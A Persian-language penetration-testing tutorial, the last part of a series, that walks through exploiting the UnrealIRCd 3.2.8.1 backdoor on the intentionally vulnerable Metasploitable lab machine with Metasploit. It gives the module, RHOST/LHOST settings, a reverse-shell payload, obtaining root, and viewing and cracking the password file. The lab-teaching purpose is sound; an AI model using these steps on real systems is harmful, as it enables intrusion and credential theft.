درخواست های ارتباط
جستجو
لیست دوستان من
صندوق پیام
همه را دیدم
  • در حال دریافت لیست پیام ها
صندوق پیام
رویدادها
همه را دیدم
  • در حال دریافت لیست رویدادها
همه رویدادهای من
تخفیف های وب سایت
همه تخفیف ها

عضویت در

کانال تلگرام

توسینسو

اطلاعات مطلب
مدرس/نویسنده
احسان امجدی
امتیاز: 58514
رتبه:14
1
199
45
620
احسان امجدی ، مشاور امنیت اطلاعات و ارتباطات و تست نفوذ سنجی ، هکر کلاه سفید ، مدرس دوره های تخصصی امنیت اطلاعات و شبکه ، تخصص در حوزه های سرویس های مایکروسافت ، Routing و Switching ، مجازی سازی ، امنیت اطلاعات و تست نفوذ ، کشف جرائم رایانه ای و سیستم عامل لینوکس ، متخصص در حوزه SOC و ... پروفایل کاربر

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

تاریخ 49 ماه قبل
نظرات 1
بازدیدها 1572
سلام به دوستان عزیز ITPro ای و علاقه‌مندان به مباحث امنیت شبکه. در قسمت پیش از آموزش نفوذ به سیستم عامل Metasploitable، نحوه اسکن کردن این سیستم عامل را از طریق کالی و بصورت ریموت (از راه دور) توضیح دادیم. در این بخش نیز در ادامه صحبت های پیشین قصد داریم تا به exploit کردن سرویس Unreal IRC بپردازیم.در مورد این سرویس بصورت مختصر در قسمت پیش توضیح دادیم و پیشنهاد میکنیم برای شروع این بخش ابتدا به مطالعه قسمت پیش بپردازید. با ما همراه باشید:

برای شروع کار ابتدا Metasploit را اجرا میکنیم:
root@kali:~#msfconsole
حالا از دستور "search" استفاده کرده و در قسمت "نام سرویس" و "نسخه برنامه" جایگذاری میکنیم:
Msf> search Unreal 3.2.8.1
اجرای این دستور، نتیجه زیر را برمیگرداند:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

یک بکدور Unreal 3.2.8.1 با قابلیت اطمینان "excellent"!
بد نیست بدانید که Exploit ها بر اساس درصد موفقیت و ماندگاری شان رتبه بندی میشوند.
اگر تعریف Metasploit را به یاد داشته باشید، میدانید که راه های مختلفی برای بهره برداری (Exploit) از یک آسیب پذیری وجود دارد:
• انتخاب یک Exploit
• تنظیم آپشن های Exploit
• انتخاب یک payload
• تنظیم اپشن های payload
• اجرای Exploit
• برقراری ارتباط با سیستم ریموت
حال میخواهیم طبق این دستور العمل سناریو خود را پیش ببریم.

انتخاب یک Exploit


اگر از دستور "info" استفاده کنیم، میتوانیم کمی بیشتر در مورد Exploit احتمالیمان اطلاعات کسب کنیم.
Msf > info exploit/unix/irc/unreal_ircd_3281_backdoor
با اجرای این دستور، توضیحات زیر بما برگردانده میشود:
"" این ماژول از یک بکدور ناخواسته که در آرشیو دانلود Unreal IRCD 3.2.8.1 اضافه شده است، سوء استفاده میکند. این بکدور در آرشیو Unreal3.2.8.1.tar.gz و بین تاریخ نوامبر 2009 تا 12 ژوئن 2010 موجود است. ""
ادامه میدهیم:
میخواهیم از Exploit مورد نظرمان استفاده کنیم. پس فرمان زیر را وارد کرده و آپشن های آن را چک میکنیم:
 Use exploit/unix/irc/unreal_ircd_3281_backdoor 

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

همانطور که میبینید، آپشن های زیادی برای تنظیم وجود ندارد. فقط کافیست که آدرس Host مقصد را وارد کنیم:
Set RHOST 192.168.198.145
که در اینجا 192.168.198.145، ادرس Metasploitable است.

انتخاب یک payload


حالا نیاز داریم تا یک payload را انتخاب کنیم. برای این منظور تایپ میکنیم : "show payloads" تا تمام payload هایی که با Exploit مورد نظر ما سازگار هستند، نمایش داده شوند:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

متاسفانه تمام آن ها از نوع شل های دستوری (command shell) هستند. خوب همانطور که قبلا هم بشما آموزش دادیم، یک Meterpreter shell ذاتا بهتر از یک شل دستوری یا command shell است؛ اما در این مورد خاص چاره ای نداریم بجز آن که یکی از شل های دستوری را انتخاب کنیم. از generic reverse shell استفاده میکنیم. این شل پس از اتمام Exploit، دقیقا ما را درون یک terminal shell در سیستم هدف قرار میدهد. حالا باید عبارت زیر را تایپ کنید:
Set payload cmd/unix/reverse
و سپس :
Show options

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی


تنظیم آپشن های payload


برای این payload آن چیزی که احتیاج داریم اینست که دستور "LHOST" را تنظیم کرده (آدرس IP سیستم کالی) و سپس مجددا برای اطمینان از صحت انجام کارها دستور "show options" را وارد کنیم:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

مقادیر RHOST (سیستم مقصد) و LHOST (سیستم کالی) بدرستی جایگذاری شده اند. همه چیز در نقطه اوج خودش قرار دارد و در نهایت برای رسیدن به هدفمان باید دستور "exploit" را صادر کنیم:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

بیاد داشته باشید که نهایت کاری که با اجرای این دستور برای شما انجام شده است، باز شدن یک session است و بعد از آن یک کرسر چشمک زن انتظار اقدام بعدی شما را میکشد.
شما در سیستم هدف و در یک Terminal shell قرار دارید!

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

همانطور که میبینید، ما عبارت "whoami" را تایپ کردیم و سیستم بلافاصله با کلمه "root" به استقبال ما آمد. شناسه کاربری root بالاترین دسترسی و سطح را در یک سیستم لینوکسی دارد.
پس همانطور که مشاهده کردید، exploit و payload ما کار میکند! این نکته را هم بگوییم که تمام دستورات استاندارد لینوکس در شل ی که ما داریم کار میکنند. برای مثال میتوانیم فایل پسورد را نشان دهیم:

آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی

همانطور که دیدید، توانستیم با کرک کردن فایل پسورد ها، به پسوردهای واقعی دست پیدا کنیم. اما اگر برایتان گنگ بود، نگران نباشید. این کار را فقط برای تست انجام دادیم و در آموزش حملات پسورد بصورت کامل اینکار را برایتان شرح خواهیم داد.
سربلند و مانا باشید.
پایان


نویسنده: احسان امجدی
منبع: انجمن تخصصی فناوری اطلاعات ایران
هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد.
برچسب ها
ردیف عنوان
1 آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش اول
2 آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش دوم
3 آموزش نفوذ به سیستم عامل آسیب پذیر Metasploitable – بخش پایانی
دوره مجموعه کل دوره
مطالب مرتبط

در حال دریافت اطلاعات

نظرات
  • سلام
    من یک IDS تحت عنوان smoothsec دارم
    تصمیم دارم این سیستم اسیب پذیرو راه اندازی کنم و بهش حمله کنم و IDS من تشخیص بده این حمله رو!..میتونم بپرسم چطور میتونم ip این سیستم عامل رو به IDS م بدم که بتونه نفوذو تشخیص بده؟

برای ارسال نظر ابتدا به سایت وارد شوید